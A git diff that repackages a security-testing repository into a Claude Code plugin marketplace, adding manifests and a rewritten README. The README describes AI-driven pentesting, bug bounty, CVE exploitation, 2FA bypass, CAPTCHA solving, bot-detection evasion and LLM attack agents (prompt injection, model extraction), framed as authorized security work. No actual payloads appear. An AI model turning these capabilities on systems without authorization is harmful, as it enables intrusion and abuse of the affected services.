diff --git a/.claude-plugin/marketplace.json b/.claude-plugin/marketplace.json new file mode 100644 index 0000000..73ef3b2 --- /dev/null +++ b/.claude-plugin/marketplace.json @@ -0,0 +1,31 @@ +{ + "name": "Transilience Community Security Tools", + "description": "Claude Code plugins for authorized security testing, bug bounty hunting, AI threat testing, and recon", + "plugins": [ + { + "name": "pentest", + "path": "plugins/pentest", + "description": "Full penetration testing framework — 100+ attack categories covering OWASP, injection, authentication, cloud, and more" + }, + { + "name": "hackerone", + "path": "plugins/hackerone", + "description": "HackerOne bug bounty integration — report generation, CSV parsing, and platform-ready submissions" + }, + { + "name": "ai-threat-testing", + "path": "plugins/ai-threat-testing", + "description": "AI security testing — OWASP LLM Top 10 with dedicated agents for prompt injection, model extraction, and more" + }, + { + "name": "techstack-identification", + "path": "plugins/techstack-identification", + "description": "Tech stack reconnaissance — 26 skills and 5 agents for DNS, cloud detection, subdomain enumeration, and more" + }, + { + "name": "skiller", + "path": "plugins/skiller", + "description": "Skill creation meta-tool — automates skill generation, validation, and PR submission for Claude Code plugins" + } + ] +} diff --git a/.claude-plugin/plugin.json b/.claude-plugin/plugin.json new file mode 100644 index 0000000..b3b673a --- /dev/null +++ b/.claude-plugin/plugin.json @@ -0,0 +1,11 @@ +{ + "name": "communitytools", + "version": "1.0.0", + "description": "Claude Code skills and agents for authorized security testing, bug bounty hunting, and pentesting workflows", + "author": { + "name": "Transilience AI", + "url": "https://github.com/transilienceai" + }, + "repository": "https://github.com/transilienceai/communitytools", + "license": "MIT" +} diff --git a/.gitignore b/.gitignore index 26244ac..a29778a 100644 --- a/.gitignore +++ b/.gitignore @@ -59,10 +59,15 @@ evidence/ # Raw data and results raw/ -*.json *.csv *.txt +# JSON data files (but NOT plugin manifests) +*.json +!.claude-plugin/plugin.json +!.claude-plugin/marketplace.json +!plugins/**/.claude-plugin/plugin.json + # Credentials and secrets credentials.json config.json diff --git a/README.md b/README.md index cd3b930..a51a891 100644 --- a/README.md +++ b/README.md @@ -8,9 +8,9 @@ [![GitHub stars](https://img.shields.io/github/stars/transilienceai/communitytools)](https://github.com/transilienceai/communitytools/stargazers) [![Claude AI](https://img.shields.io/badge/Powered%20by-Claude%20AI-blue)](https://claude.ai) -**Open-source Claude Code skills, agents, and slash commands for AI-powered penetration testing, bug bounty hunting, and security research** +**Open-source Claude Code plugins for AI-powered penetration testing, bug bounty hunting, AI threat testing, and security reconnaissance** -[🚀 Quick Start](#-quick-start) • [📖 Documentation](#-documentation) • [🤝 Contributing](CONTRIBUTING.md) • [🌐 Website](https://www.transilience.ai) +[🚀 Quick Start](#-quick-start) • [📦 Plugins](#-available-plugins) • [📖 Documentation](#-how-it-works) • [🤝 Contributing](CONTRIBUTING.md) • [🌐 Website](https://www.transilience.ai) @@ -19,10 +19,8 @@ ## 📋 Table of Contents - [Overview](#-overview) -- [Key Features](#-key-features) +- [Available Plugins](#-available-plugins) - [Architecture](#-architecture) -- [Use Cases](#-use-cases) -- [Available Tools](#-available-tools) - [Quick Start](#-quick-start) - [How It Works](#-how-it-works) - [Contributing](#-contributing) @@ -35,387 +33,195 @@ ## 🎯 Overview -**Transilience AI Community Tools** is a comprehensive collection of **Claude Code skills, agents, and slash commands** for security testing, penetration testing, and bug bounty hunting. This repository provides AI-powered security workflows that run directly in Claude Code, enabling automated vulnerability testing, reconnaissance, and professional security reporting. +**Transilience AI Community Tools** is a **Claude Code plugin marketplace** providing AI-powered security workflows for penetration testing, bug bounty hunting, AI threat testing, and tech stack reconnaissance. Each tool is packaged as an independent plugin — install only what you need. ### What's Inside? -This repository provides a complete **Claude Code security testing framework**: +This repository hosts **5 independent Claude Code plugins**: -- 🎯 **7 Security Testing Skills** - Pentest, HackerOne, CVE testing, domain assessment, web app mapping -- 🤖 **35+ Specialized Agents** - SQL injection, XSS, SSRF, JWT, OAuth, SSTI, XXE, and more -- 🔧 **6 Orchestration Agents** - Multi-phase coordinators (Pentester, HackerOne Hunter, Git workflows) -- 📝 **14 Slash Commands** - `/pentest`, `/hackerone`, `/commit`, `/pr`, `/issue`, `/branch`, `/skiller` -- 📚 **264+ Lab Walkthroughs** - PortSwigger Academy solutions with step-by-step guides -- 📊 **Standardized Outputs** - Professional reports with CVSS scoring and evidence +| Plugin | Skills | Agents | Hooks | Purpose | +|--------|--------|--------|-------|---------| +| `pentest` | 6 | 3 | — | Full penetration testing framework | +| `hackerone` | 1 | 1 | — | Bug bounty automation | +| `ai-threat-testing` | 1 | 10 | — | OWASP LLM Top 10 testing | +| `techstack-identification` | 26 | 5 | 3 | Tech stack reconnaissance | +| `skiller` | 1 | 1 | — | Skill creation meta-tool | ### Why Choose Transilience Community Tools? -- 🤖 **AI-Powered Automation** - Claude AI orchestrates intelligent security testing workflows -- 🎯 **35+ Specialized Agents** - Parallel vulnerability testing across all OWASP categories -- 🔍 **Complete OWASP Coverage** - 100% OWASP Top 10 + SANS Top 25 CWE testing -- 📊 **Professional Reporting** - CVSS 3.1, CWE, MITRE ATT&CK, remediation guidance -- 🔬 **Playwright Integration** - Browser automation for client-side vulnerability testing -- 🎓 **Educational Resources** - 264+ lab walkthroughs, 46+ attack type documentation -- 📚 **Claude Code Native** - Works seamlessly in Claude Code IDE with slash commands -- ⚖️ **Open Source** - MIT licensed for commercial and personal use +- 🤖 **AI-Powered Automation** — Claude orchestrates intelligent security testing workflows +- 📦 **Modular Plugin Architecture** — Install only what you need, update independently +- 🔍 **Complete OWASP Coverage** — 100% OWASP Top 10 + OWASP LLM Top 10 +- 📊 **Professional Reporting** — CVSS 3.1, CWE, MITRE ATT&CK, remediation guidance +- 🔬 **Playwright Integration** — Browser automation for client-side vulnerability testing +- 💣 **PATT Payload Database** — 50+ curated payload files from PayloadsAllTheThings +- 📚 **264+ Lab Walkthroughs** — PortSwigger Academy solutions +- ⚖️ **Open Source** — MIT licensed for commercial and personal use --- -## 🏗️ Architecture - -### Claude Code Skills & Agents Framework - -This repository provides **Claude Code skills**, **specialized agents**, and **slash commands** for security testing workflows. - -```mermaid -graph TB - subgraph "User Interface" - A[Security Researcher
Penetration Tester
Bug Bounty Hunter] - end - - subgraph "Claude Code IDE" - B[Slash Commands
/pentest /hackerone /commit] - end - - subgraph "Skills Layer .claude/skills/" - C1[Pentest Skill] - C2[HackerOne Skill] - C3[CVE Testing] - C4[Domain Assessment] - C5[Web App Mapping] - C6[Common AppSec] - C7[Authenticating] - end - - subgraph "Orchestration Agents .claude/agents/" - D1[Pentester Agent
Multi-phase coordinator] - D2[HackerOne Hunter
Bug bounty workflow] - D3[Git Workflow Agents
Issue/PR/Branch] - D4[Skiller Agent
Skill creation] - end - - subgraph "Specialized Agents .claude/agents/specialized/" - E1[SQL Injection] - E2[XSS Testing] - E3[SSRF Detection] - E4[JWT Attack] - E5[OAuth Testing] - E6[SSTI Detection] - E7[XXE Testing] - E8[35+ More Agents] - end +## 📦 Available Plugins - subgraph "Tools & Automation" - F1[Playwright MCP
Browser automation] - F2[HTTP Testing
curl/httpx/requests] - F3[Evidence Capture
Screenshots/Videos] - end - - subgraph "Standardized Outputs .claude/output-standards/" - G1[Reconnaissance
inventory/ + analysis/] - G2[Vulnerability Testing
findings/ + evidence/] - G3[Bug Bounty
Platform submissions] - end +### `pentest` — Comprehensive Penetration Testing - A --> B - B --> C1 & C2 & C3 & C4 & C5 & C6 & C7 - C1 --> D1 - C2 --> D2 - C3 & C4 & C5 & C6 --> D1 - D1 & D2 --> E1 & E2 & E3 & E4 & E5 & E6 & E7 & E8 - E1 & E2 & E3 & E4 & E5 & E6 & E7 & E8 --> F1 & F2 & F3 - F1 & F2 & F3 --> G1 & G2 & G3 - - style B fill:#4CAF50,color:#fff - style D1 fill:#2196F3,color:#fff - style G2 fill:#9C27B0,color:#fff -``` - -### Repository Structure - -``` -communitytools/ -├── .claude/ -│ ├── skills/ # Security testing skills -│ │ ├── pentest/ # 46+ attack types, 264+ lab walkthroughs -│ │ ├── hackerone/ # Bug bounty hunting automation -│ │ ├── cve-testing/ # CVE vulnerability testing -│ │ ├── domain-assessment/ # Subdomain discovery, port scanning -│ │ ├── web-application-mapping/ # Endpoint discovery, tech detection -│ │ ├── common-appsec-patterns/ # OWASP Top 10 testing -│ │ └── authenticating/ # Auth testing, 2FA bypass, bot evasion -│ │ -│ ├── agents/ # Orchestration agents -│ │ ├── pentester.md # Multi-phase pentest coordinator -│ │ ├── hackerone-hunter.md # Bug bounty workflow orchestrator -│ │ ├── skiller.md # Skill creation/management -│ │ ├── git-*.md # Git workflow automation -│ │ └── specialized/ # 35+ vulnerability-specific agents -│ │ ├── sql-injection-agent.md -│ │ ├── xss-agent.md -│ │ ├── ssrf-agent.md -│ │ ├── jwt-agent.md -│ │ └── ... (31 more) -│ │ -│ ├── commands/ # Slash commands -│ │ ├── pentest.md # /pentest command -│ │ ├── hackerone.md # /hackerone command -│ │ ├── commit.md # /commit workflow -│ │ └── ... (11 total) -│ │ -│ └── output-standards/ # Standardized output formats -│ ├── OUTPUT_STANDARDS.md -│ └── reference/ -│ -├── outputs/ # Generated findings and reports -├── CLAUDE.md # Repository-wide instructions -├── CONTRIBUTING.md # Contribution guidelines -└── README.md # This file -``` +**6 skills • 3 agents • 46+ attack types • 264+ PortSwigger lab walkthroughs** -### Multi-Agent Execution Flow - -```mermaid -sequenceDiagram - participant User - participant Skill as Pentest Skill - participant Orch as Pentester Agent - participant Agents as Specialized Agents - participant Tools as Playwright/HTTP - participant Output as Standardized Outputs - - User->>Skill: /pentest https://target.com - Skill->>Orch: Initialize 7-phase workflow - - Orch->>Agents: Phase 1-2: Deploy recon agents - Agents->>Tools: Domain assessment, port scanning - Tools-->>Output: inventory/*.json + analysis/*.md - - Orch->>Agents: Phase 3-4: Deploy 35+ vuln agents in parallel - Agents->>Tools: SQL/XSS/SSRF/JWT/OAuth testing - Tools-->>Output: findings/*.json + evidence/*.png - - Orch->>Output: Phase 5: Generate reports - Output-->>User: Executive + technical reports - - Note over Agents,Tools: Specialized agents:
SQL, NoSQL, XSS, SSRF,
JWT, OAuth, SSTI, XXE,
+ 27 more types -``` - ---- - -## 💡 Use Cases - -### 1. Penetration Testing - -Execute comprehensive security assessments using the `/pentest` command: - -```bash -# In Claude Code -/pentest - -# Deploys 35+ specialized agents to test for: -# - Injection flaws (SQL, NoSQL, Command, SSTI, XXE) -# - Authentication/authorization bypass -# - Client-side attacks (XSS, CSRF, Clickjacking) -# - Server-side vulnerabilities (SSRF, file upload, path traversal) -# - API security issues (GraphQL, REST, JWT, OAuth) -# - Business logic flaws and race conditions -``` +Orchestrates a complete 7-phase penetration test using specialized vulnerability agents. -**Output:** Professional pentest reports with CVSS scores, remediation guidance, and evidence. +**Skills included:** +- `/pentest` — Full 7-phase PTES methodology with 35+ parallel testing agents +- `/authenticating` — Auth testing, 2FA bypass, CAPTCHA, bot detection evasion +- `/common-appsec-patterns` — OWASP Top 10 quick-hit testing +- `/cve-testing` — CVE research, matching, and exploitation attempts +- `/domain-assessment` — Subdomain discovery, port scanning, attack surface mapping +- `/web-application-mapping` — Endpoint discovery, technology detection, app mapping -### 2. Bug Bounty Hunting - -Automate bug bounty workflows with the `/hackerone` command: - -```bash -# In Claude Code -/hackerone - -# Workflow: -# 1. Parse program scope from CSV/text -# 2. Deploy parallel testing across all in-scope assets -# 3. Validate proof-of-concept for each finding -# 4. Generate platform-ready submission reports -# 5. Auto-categorize severity and impact -``` - -**Output:** HackerOne/Bugcrowd-formatted submissions with PoC, impact analysis, and reproduction steps. - -### 3. CVE Testing & Research - -Test applications for known CVEs: - -```bash -# In Claude Code -# Example: Test for specific CVE -"Test this application for CVE-2023-XXXX" - -# The cve-testing skill: -# 1. Identifies technology stack -# 2. Researches applicable CVEs -# 3. Deploys exploitation attempts -# 4. Validates with proof-of-concept -# 5. Documents findings -``` - -**Output:** CVE validation reports with exploit status and remediation steps. - -### 4. Web Application Security Assessment - -Comprehensive web app security testing: - -```bash -# Phase 1: Reconnaissance -/domain-assessment # Subdomain discovery, port scanning -/web-application-mapping # Endpoint discovery, tech detection - -# Phase 2: Vulnerability Testing -/common-appsec-patterns # OWASP Top 10 testing -/authenticating # Authentication testing, 2FA bypass - -# Phase 3: Full Pentest -/pentest # Complete security assessment -``` - -**Output:** Multi-phase reports with attack surface inventory → vulnerability findings → remediation roadmap. - ---- - -## 🛠️ Available Skills & Commands - -### Security Testing Skills - -#### `/pentest` - Comprehensive Penetration Testing - -**46+ attack types, 264+ PortSwigger lab walkthroughs, 35+ specialized agents** - -Orchestrates a complete 7-phase penetration test using specialized vulnerability agents: - -**Vulnerability Coverage:** +**Vulnerability coverage:** - **Injection:** SQL, NoSQL, Command, SSTI, XXE, LDAP/XPath - **Client-Side:** XSS (Reflected/Stored/DOM), CSRF, Clickjacking, CORS, Prototype Pollution - **Server-Side:** SSRF, HTTP Smuggling, File Upload, Path Traversal, Deserialization - **Authentication:** Auth Bypass, JWT, OAuth, Password Attacks, Session Fixation - **API Security:** GraphQL, REST API, WebSockets, Web LLM -- **Business Logic:** Logic Flaws, Race Conditions, Access Control, Cache Poisoning/Deception -- **Web Apps:** IDOR, Host Header Injection, Information Disclosure - -**Features:** -- 🤖 **35+ Specialized Agents** deployed in parallel -- 📚 **264+ Lab Walkthroughs** from PortSwigger Academy -- 🎯 **OWASP Top 10** complete coverage -- 🔬 **Playwright Automation** for browser-based testing -- 📊 **Professional Reports** with CVSS 3.1 scoring -- 🎨 **Evidence Capture** (screenshots, videos, HTTP logs) +- **Business Logic:** Race Conditions, Access Control, Cache Poisoning/Deception, IDOR +- **Cloud/System:** AWS, Azure, GCP, Docker, Kubernetes, Active Directory --- -#### `/hackerone` - Bug Bounty Hunting Automation +### `hackerone` — Bug Bounty Automation + +**1 skill • 1 agent** -**Automated bug bounty workflow from scope parsing to submission** +Automated bug bounty workflow from scope parsing to platform-ready submission. -- Parse program scope (CSV/text/wildcards) -- Parallel testing across all in-scope assets -- Automated PoC validation -- Platform-ready submission reports (HackerOne, Bugcrowd) -- CVSS scoring and impact analysis +**Skills included:** +- `/hackerone` — Parse scope, parallel testing, PoC validation, HackerOne/Bugcrowd-ready reports --- -#### `/domain-assessment` - Reconnaissance & Attack Surface Mapping +### `ai-threat-testing` — AI Security Testing -- Subdomain discovery (multiple sources) -- Port scanning and service detection -- Technology stack identification -- Attack surface inventory -- Testing checklist generation +**1 skill • 10 agents** ---- +Full OWASP LLM Top 10 (2025) coverage with dedicated agents per vulnerability class. -#### `/web-application-mapping` - Web App Discovery +**Skills included:** +- `/ai-threat-testing` — Orchestrates all 10 LLM vulnerability agents -- Passive browsing and spidering -- Active endpoint discovery -- Technology detection -- Headless browser automation -- Comprehensive application mapping +**Agents (one per LLM risk):** +- LLM01: Prompt Injection +- LLM02: Insecure Output Handling +- LLM03: Training Data Poisoning +- LLM04: Resource Exhaustion +- LLM05: Supply Chain Vulnerabilities +- LLM06: Excessive Agency +- LLM07: Model Extraction +- LLM08: Vector & Embedding Poisoning +- LLM09: Overreliance +- LLM10: Logging & Monitoring Bypass --- -#### `/cve-testing` - CVE Vulnerability Testing +### `techstack-identification` — Tech Stack Reconnaissance -- Technology stack identification -- CVE research and matching -- Automated exploitation attempts -- PoC validation -- Vulnerability documentation +**26 skills • 5 agents • 3 lifecycle hooks** ---- +Comprehensive reconnaissance suite for identifying technology stacks from passive signals. -#### `/common-appsec-patterns` - OWASP Top 10 Testing +**Skills included (26):** +DNS intelligence, subdomain enumeration, certificate transparency, HTTP fingerprinting, TLS analysis, CDN/WAF detection, cloud infrastructure detection, frontend/backend inference, JavaScript DOM analysis, HTML content analysis, API portal discovery, code repository intel, job posting analysis, IP attribution, web archive analysis, security posture analysis, signal correlation, third-party detection, devops detection, domain discovery, evidence formatting, confidence scoring, conflict resolution, JSON report generation, report exporter. -Quick-hit testing for common web application vulnerabilities: -- XSS, SQL injection, SSRF patterns -- Authentication/authorization flaws -- Security misconfigurations -- Client-side security issues +**Hooks (automatic lifecycle guards):** +- `PreToolUse` (Bash/WebSearch/WebFetch) — Network connectivity check +- `PreToolUse` (Bash/WebSearch/WebFetch) — Per-service rate limiting (crt.sh, GitHub API, DNS) +- `PostToolUse` (all) — Execution logging, evidence capture, metrics CSV --- -#### `/authenticating` - Authentication Security Testing +### `skiller` — Skill Creation Meta-Tool -- Signup/login workflow testing -- 2FA/MFA bypass techniques -- CAPTCHA solving -- Bot detection evasion -- Behavioral biometrics simulation -- OTP handling +**1 skill • 1 agent** ---- +Automates the full contribution workflow for creating new Claude Code plugins. -### Workflow Automation Commands +**Skills included:** +- `/skiller` — Interactive: CREATE / UPDATE / REMOVE skills with automated GitHub workflow (issue → branch → skill generation → validation → commit → PR) -#### `/commit` - Git Commit Automation -Auto-generate conventional commit messages and create commits +--- -#### `/pr` - Pull Request Creation -Create PRs with auto-generated descriptions linking to issues +## 🏗️ Architecture -#### `/issue` - GitHub Issue Creation -Generate well-formatted GitHub issues with templates +### Plugin Marketplace Structure -#### `/branch` - Git Branch Management -Create branches following conventional naming patterns +``` +communitytools/ +├── .claude-plugin/ +│ ├── marketplace.json # Indexes all 5 plugins +│ └── plugin.json # Root plugin metadata +│ +├── plugins/ +│ ├── pentest/ +│ │ ├── .claude-plugin/plugin.json +│ │ ├── agents/ # pentester-orchestrator, pentester-executor, patt-fetcher +│ │ └── skills/ # pentest, authenticating, common-appsec-patterns, +│ │ # cve-testing, domain-assessment, web-application-mapping +│ │ +│ ├── hackerone/ +│ │ ├── .claude-plugin/plugin.json +│ │ ├── agents/ # hackerone +│ │ └── skills/ # hackerone (with CSV/reporting tools) +│ │ +│ ├── ai-threat-testing/ +│ │ ├── .claude-plugin/plugin.json +│ │ ├── agents/ # llm01 through llm10 +│ │ └── skills/ # ai-threat-testing +│ │ +│ ├── techstack-identification/ +│ │ ├── .claude-plugin/plugin.json +│ │ ├── agents/ # asset_discovery, correlation, data_collection, +│ │ │ # report_generation, tech_inference +│ │ ├── skills/ # 26 recon skills +│ │ └── hooks/ +│ │ ├── hooks.json # PreToolUse + PostToolUse lifecycle wiring +│ │ └── scripts/ # pre_network, pre_rate_limit, post_logging +│ │ +│ └── skiller/ +│ ├── .claude-plugin/plugin.json +│ ├── agents/ # skiller +│ └── skills/ # skiller +│ +├── benchmarks/ # AutoPenBench performance benchmarks +├── tools/ # Kali and Playwright setup scripts +├── AGENTS.md # Passive security knowledge base (always loaded) +└── CLAUDE.md # Repository-wide Claude Code context +``` -#### `/skiller` - Skill Development Assistant -Create, update, or remove Claude Code skills with GitHub workflow integration +### Multi-Agent Execution Flow ---- +```mermaid +sequenceDiagram + participant User + participant Skill as Skill Layer + participant Orch as Orchestrator Agent + participant Agents as Specialized Agents + participant Hooks as Lifecycle Hooks + participant Output as Standardized Outputs -### 🔧 Creating Custom Skills + User->>Skill: /pentest https://target.com + Skill->>Orch: Initialize 7-phase workflow -Use the `/skiller` command to create your own security testing skills: + Orch->>Agents: Phase 1-2: Deploy recon agents + Agents-->>Output: inventory/*.json + analysis/*.md -```bash -# In Claude Code -/skiller + Orch->>Agents: Phase 3-4: Deploy vuln agents in parallel + Note over Agents: SQL/XSS/SSRF/JWT/OAuth/SSTI/XXE... + Agents-->>Output: findings/*.json + evidence/*.png -# Interactive workflow: -# 1. Choose: CREATE, UPDATE, or REMOVE -# 2. Provide skill details (name, description, agents) -# 3. Select GitHub workflow (optional) -# 4. Auto-generates: structure, documentation, validation -# 5. Creates: issue, branch, commit, PR -``` + Orch->>Output: Phase 5: Generate reports + Output-->>User: Executive + technical reports -**Skill Structure:** -``` -.claude/skills/your-skill/ -├── skill.md # Skill definition -├── CLAUDE.md # Context for Claude -├── README.md # User documentation -└── agents/ # Specialized agents (optional) + Note over Hooks: techstack-identification only + Hooks->>Hooks: PreToolUse: network check + rate limit + Hooks->>Hooks: PostToolUse: log + capture evidence ``` --- @@ -424,362 +230,188 @@ Use the `/skiller` command to create your own security testing skills: ### Prerequisites -- **Claude Code** - AI-powered IDE by Anthropic ([Install Claude Code](https://claude.ai/download)) -- **Git** - For cloning the repository -- **Written Authorization** - Always get permission before testing any systems +- **Claude Code** ([Install](https://claude.ai/download)) +- **Written Authorization** — Always get permission before testing any systems ### Installation -**Step 1: Clone the Repository** +**Install the full marketplace (browse all plugins):** ```bash -git clone https://github.com/transilienceai/communitytools.git -cd communitytools +/plugin marketplace add transilienceai/communitytools ``` -**Step 2: Open in Claude Code** +**Install a specific plugin:** ```bash -# Open the repository in Claude Code -claude-code . - -# Or open Claude Code and use: File → Open Folder → Select communitytools/ +/plugin install transilienceai/communitytools/pentest +/plugin install transilienceai/communitytools/hackerone +/plugin install transilienceai/communitytools/ai-threat-testing +/plugin install transilienceai/communitytools/techstack-identification +/plugin install transilienceai/communitytools/skiller ``` -**Step 3: Skills Auto-Load** - -Claude Code automatically discovers skills in `.claude/skills/` and commands in `.claude/commands/`. No additional configuration needed! - -### Usage Examples - -**Run a Penetration Test:** +**Install scoped to current project only:** ```bash -# In Claude Code chat: -/pentest - -# Or provide specific instructions: -"Run a comprehensive pentest on https://testsite.com (I have written authorization)" +/plugin install transilienceai/communitytools/pentest --scope project ``` -**Bug Bounty Hunting:** +**Alternative — clone the repository directly:** ```bash -# In Claude Code chat: -/hackerone - -# Then provide program details or scope file: -"Here's the HackerOne program scope: [paste CSV/text]" +git clone https://github.com/transilienceai/communitytools.git +cd communitytools ``` -**Reconnaissance:** +### Usage Examples +**Penetration Testing:** ```bash -/domain-assessment -# Discovers subdomains, ports, services, technologies - -/web-application-mapping -# Maps endpoints, parameters, application structure +/pentest +# Deploys 35+ specialized agents across all OWASP categories ``` -**Quick Vulnerability Testing:** - +**Bug Bounty:** ```bash -/common-appsec-patterns -# Tests for OWASP Top 10 vulnerabilities - -/authenticating -# Tests authentication, 2FA, CAPTCHA, bot detection +/hackerone +# Parse scope → parallel test → validate PoC → platform-ready report ``` -**Development Workflow:** - +**AI Security Testing:** ```bash -/skiller # Create/update skills -/issue # Create GitHub issues -/branch # Create feature branches -/commit # Auto-generate commit messages -/pr # Create pull requests +/ai-threat-testing +# Runs OWASP LLM Top 10 agents against your AI application ``` -### First-Time User Tutorial - +**Tech Stack Reconnaissance:** ```bash -# 1. Open Claude Code and load this repository -claude-code /path/to/communitytools - -# 2. In the Claude Code chat, try: -/pentest +/dns_intelligence # DNS records and passive recon +/subdomain_enumeration # Subdomain discovery +/cloud_infra_detector # Identify cloud providers +/signal_correlator # Aggregate all signals into tech profile +``` -# 3. Claude will ask for: -# - Target URL/application -# - Authorization confirmation -# - Testing scope (subdomains, specific paths, etc.) -# - Authentication credentials (if needed) - -# 4. The pentester agent will: -# - Deploy 35+ specialized vulnerability agents -# - Test in parallel across all vulnerability categories -# - Generate findings in outputs/ directory -# - Create professional reports with evidence - -# 5. Review outputs: -# outputs/pentest// -# ├── findings/ # JSON + markdown vulnerability reports -# ├── evidence/ # Screenshots, videos, HTTP logs -# └── reports/ # Executive + technical reports +**Skill Development:** +```bash +/skiller +# CREATE → name → description → auto GitHub workflow ``` --- ## 🔄 How It Works -### Skill → Agent → Tool Execution Model +### Three-Layer Architecture -This repository implements a **three-layer architecture**: +Each plugin implements the same pattern: -1. **Skills Layer** (`.claude/skills/`) - User-facing workflows invoked via slash commands -2. **Agents Layer** (`.claude/agents/`) - Orchestrators and specialized testing agents -3. **Tools Layer** - Playwright MCP, HTTP clients, evidence capture +1. **Skills Layer** (`plugins//skills/`) — User-facing workflows invoked via slash commands +2. **Agents Layer** (`plugins//agents/`) — Orchestrators and specialized testing agents +3. **Hooks Layer** (`plugins//hooks/`) — Automatic lifecycle guards (techstack plugin) ```mermaid flowchart TB subgraph "1️⃣ User Invokes Skill" - A["/pentest
/hackerone
/domain-assessment"] - end - - subgraph "2️⃣ Skill Loads Context" - B1[Load SKILL.md] - B2[Load CLAUDE.md] - B3[Define methodology] + A["/pentest | /hackerone | /ai-threat-testing"] end - subgraph "3️⃣ Deploy Orchestrator Agent" - C1[Pentester Agent] - C2[HackerOne Hunter] - C3[Domain Assessor] + subgraph "2️⃣ Plugin Loads Context" + B1[SKILL.md — methodology] + B2[AGENTS.md — passive knowledge base] end - subgraph "4️⃣ Spawn Specialized Agents in Parallel" - D1[SQL Injection Agent] - D2[XSS Agent] - D3[SSRF Agent] - D4[JWT Agent] - D5[35+ More Agents] + subgraph "3️⃣ Orchestrator Agent Deploys" + C1[pentester-orchestrator] + C2[hackerone agent] + C3[ai-threat-testing skill] end - subgraph "5️⃣ Execute Tests with Tools" - E1[Playwright
Browser automation] - E2[HTTP Testing
curl/httpx/requests] - E3[Evidence Capture
Screenshots/Videos] + subgraph "4️⃣ Specialized Agents in Parallel" + D1[SQL / XSS / SSRF / JWT] + D2[LLM01–LLM10 agents] + D3[26 recon skills] end - subgraph "6️⃣ Generate Standardized Outputs" - F1[findings/
JSON + markdown] - F2[evidence/
Screenshots/videos] - F3[reports/
Executive/technical] + subgraph "5️⃣ Standardized Outputs" + F1[findings/ — JSON + markdown] + F2[evidence/ — screenshots/videos] + F3[reports/ — executive/technical] end - A --> B1 & B2 & B3 - B1 & B2 & B3 --> C1 & C2 & C3 - C1 & C2 & C3 --> D1 & D2 & D3 & D4 & D5 - D1 & D2 & D3 & D4 & D5 --> E1 & E2 & E3 - E1 & E2 & E3 --> F1 & F2 & F3 + A --> B1 & B2 + B1 & B2 --> C1 & C2 & C3 + C1 & C2 & C3 --> D1 & D2 & D3 + D1 & D2 & D3 --> F1 & F2 & F3 style A fill:#4CAF50,color:#fff style C1 fill:#2196F3,color:#fff style F3 fill:#9C27B0,color:#fff ``` -### Example: Pentest Workflow - -**User:** `/pentest` (in Claude Code) - -**Step 1: Skill Loads** -- Reads `.claude/skills/pentest/skill.md` for methodology -- Loads `.claude/skills/pentest/CLAUDE.md` for context -- Identifies 46+ attack types and 264+ lab walkthroughs - -**Step 2: Pentester Agent Deploys** -- Reads `.claude/agents/pentester.md` for orchestration logic -- Implements 7-phase PTES methodology -- Coordinates parallel agent deployment - -**Step 3: Specialized Agents Execute** -``` -Pentester Agent spawns in parallel: -├─ SQL Injection Agent (.claude/agents/specialized/sql-injection-agent.md) -├─ XSS Agent (.claude/agents/specialized/xss-agent.md) -├─ SSRF Agent (.claude/agents/specialized/ssrf-agent.md) -├─ JWT Agent (.claude/agents/specialized/jwt-agent.md) -├─ OAuth Agent (.claude/agents/specialized/oauth-agent.md) -└─ 30+ more agents... -``` - -**Step 4: Tools Execute Tests** -- **Playwright MCP**: Browser-based testing (XSS, CSRF, Clickjacking, Auth) -- **HTTP Testing**: Server-side vulnerabilities (SQL, SSRF, XXE, File Upload) -- **Evidence Capture**: Screenshots at each test step, HTTP request/response logs - -**Step 5: Outputs Generated** -``` -outputs/pentest// -├── findings/ -│ ├── findings.json # Machine-readable (CVSS, CWE, OWASP) -│ ├── finding-001.md # SQL injection in login -│ ├── finding-002.md # Stored XSS in comments -│ └── finding-003.md # JWT signature bypass -├── evidence/ -│ ├── screenshots/ # Visual proof -│ ├── videos/ # Exploitation recordings -│ └── http-logs/ # Request/response captures -├── reports/ -│ ├── executive-summary.md # Business impact -│ └── technical-report.md # Complete findings -└── metadata.json # Testing details -``` - ### Standardized Output Formats -All skills follow **OUTPUT_STANDARDS.md** (`.claude/output-standards/`): +All skills follow `OUTPUT_STANDARDS.md`: | Output Type | Directory Structure | Use Case | |-------------|---------------------|----------| -| **Reconnaissance** | `inventory/` + `analysis/` | Domain assessment, web app mapping | +| **Reconnaissance** | `inventory/` + `analysis/` | Domain assessment, web app mapping, techstack | | **Vulnerability Testing** | `findings/` + `evidence/` + `reports/` | Pentest, CVE testing, AppSec patterns | | **Bug Bounty** | Platform-ready submissions | HackerOne, Bugcrowd formatted | -**Key Features:** -- ✅ CVSS 3.1 scoring -- ✅ CWE mapping -- ✅ OWASP Top 10 categorization -- ✅ MITRE ATT&CK TTPs -- ✅ Remediation guidance -- ✅ Evidence-based validation +**Key features:** +- CVSS 3.1 scoring +- CWE mapping +- OWASP Top 10 categorization +- MITRE ATT&CK TTPs +- Remediation guidance +- Evidence-based validation --- ## 🤝 Contributing -We welcome contributions from the security community! Whether you're fixing a bug, improving documentation, or adding new security testing capabilities, your help makes these tools better for everyone. - -### Ways to Contribute - - - - - - - -
- -**🐛 Report Issues** -- Bug reports -- False positives -- Feature requests -- Documentation improvements - - - -**💻 Contribute Code** -- Fix bugs -- Add new agents -- Improve detection -- Optimize performance - - - -**📚 Improve Docs** -- Write tutorials -- Add examples -- Fix typos -- Create guides - -
+We welcome contributions from the security community! ### Contribution Workflow -**Automated Workflow (Recommended):** +**Automated (Recommended) — using `/skiller`:** ```bash -# Use the /skiller command for automated contribution workflow /skiller - -# Interactive prompts will: -# 1. Create GitHub issue -# 2. Create feature branch (via git-branch-manager agent) -# 3. Generate skill structure and documentation -# 4. Create commit with conventional format (via git-issue-creator) -# 5. Create pull request linking to issue (via git-pr-creator) +# 1. Choose: CREATE, UPDATE, or REMOVE +# 2. Provide skill details +# 3. Select target plugin +# 4. Auto-generates: GitHub issue → branch → skill → validation → commit → PR ``` -**Manual Workflow:** +**Manual workflow:** -```mermaid -flowchart TD - A[Fork Repository] --> B[Create Issue
/issue or gh issue create] - B --> C[Create Branch
/branch feature/skill-name] - C --> D[Develop Skill
Add agents, docs, tests] - D --> E[Test in Claude Code
Invoke skill, validate outputs] - E --> F{Tests Pass?} - F -->|No| D - F -->|Yes| G[Create Commit
/commit] - G --> H[Push to Fork] - H --> I[Create PR
